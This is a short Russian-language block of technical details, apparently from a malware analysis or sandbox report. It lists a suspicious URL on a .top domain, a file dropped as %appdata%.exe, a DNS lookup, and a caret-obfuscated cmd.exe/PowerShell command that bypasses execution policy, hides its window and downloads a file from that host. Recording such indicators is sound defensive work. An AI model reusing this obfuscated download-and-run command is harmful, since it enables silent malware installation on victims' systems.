Техническая информация
- http://www.fopeioaas.top/read.php?f=1.gif как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "poW^e^rshe^lL^.EXe ^-EXeC^UT^i^onP^oLiCY BYpA^S^s ^-nopr^OFi^L^E -w^InDoWst^yL^E ^Hid^deN ^(N^eW^-^OBjEc^T^ S^YS^Tem.nET^.We^b^c^LIen^T^).D^O^w^NloAdFIle('http://www.fopei...
- DNS ASK fo###oaas.top
- '<SYSTEM32>\cmd.exe' /C "poW^e^rshe^lL^.EXe ^-EXeC^UT^i^onP^oLiCY BYpA^S^s ^-nopr^OFi^L^E -w^InDoWst^yL^E ^Hid^deN ^(N^eW^-^OBjEc^T^ S^YS^Tem.nET^.We^b^c^LIen^T^).D^O^w^NloAdFIle('http://www.fopei...' (со скрытым окном)